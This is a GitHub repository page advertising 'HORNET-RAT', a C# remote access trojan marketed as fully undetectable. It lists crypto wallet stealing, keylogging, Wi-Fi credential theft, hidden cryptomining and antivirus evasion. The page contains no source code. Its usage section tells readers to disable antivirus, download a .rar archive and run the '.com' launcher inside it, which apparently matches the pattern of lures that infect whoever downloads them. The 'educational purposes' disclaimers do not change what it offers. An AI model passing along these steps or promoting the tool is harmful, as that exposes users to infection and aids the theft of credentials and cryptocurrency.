Skip to content

Stealthy Fully Undetectable (FUD) RAT with 15 plugins: stealer, crypto stealer, keylogger, remote desktop and more more...

License

Notifications You must be signed in to change notification settings

queentessaru/HORNET-RAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

HORNET-RAT

HORNETrat, also known as 'HORNET Worm,' is a sophisticated .NET-based remote access Trojan (RAT) coded in C#. This malware operates with a high degree of technical sophistication and discretion, exhibiting a comprehensive array of functionalities, reminiscent of a Swiss army knife for cyber espionage. cop Disclaimer: It is important to emphasize that the use of HORNETrat or any similar malware is illegal and unethical. This information is shared solely for educational purposes, and the author and publisher disclaim any responsibility for misuse or unlawful activities associated with this knowledge.

Technical capabilities include:

  • Crypto Wallet Scraper: HORNETrat has the ability to clandestinely infiltrate and exfiltrate data from cryptocurrency wallets, utilizing advanced obfuscation techniques to avoid detection by heuristic antivirus scanners.

  • Keylogging Expertise: Functioning as a silent observer, it employs sophisticated keylogging mechanisms, capturing every keystroke with precision, potentially compromising login credentials and sensitive information.

  • Wi-Fi Data Theft: The Trojan can stealthily pilfer Wi-Fi credentials and network configurations, compromising the integrity of the victim's network environment.

  • Cryptocurrency Mining Addition: HORNETrat can surreptitiously inject cryptocurrency mining scripts into infected systems, exploiting computational resources for financial gain without the victim's knowledge or consent.

  • History Theft: It is capable of extracting sensitive browser history data, potentially revealing a user's online activities and patterns.

  • Evasion Techniques: HORNETrat deploys advanced evasion techniques to bypass firewall rules and intrusion detection systems, operating in a covert manner that evades security scrutiny.

  • And more, more and more...

Usage

System Requirements:

• Operating System: Windows only. • Disable your antivirus software for the proper functioning of the program.

Installation Instructions:

  1. Download the program from the GitHub repository.
  2. Extract the application from the “HORNETrat_launcher.rar” file.
  3. Place the extracted .com application on your desktop.

Note: • Ensure that your antivirus software is disabled while using the program for seamless operation.

For any further assistance or inquiries, please refer to the GitHub repository’s documentation or contact the developer. Feel free to customize this guide with specific details about your program and any additional information you’d like to provide.

Please be aware that HORNETrat and similar malware pose a significant threat to cybersecurity, and any attempt to deploy or use such software for malicious purposes is against the law.

About

Stealthy Fully Undetectable (FUD) RAT with 15 plugins: stealer, crypto stealer, keylogger, remote desktop and more more...

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published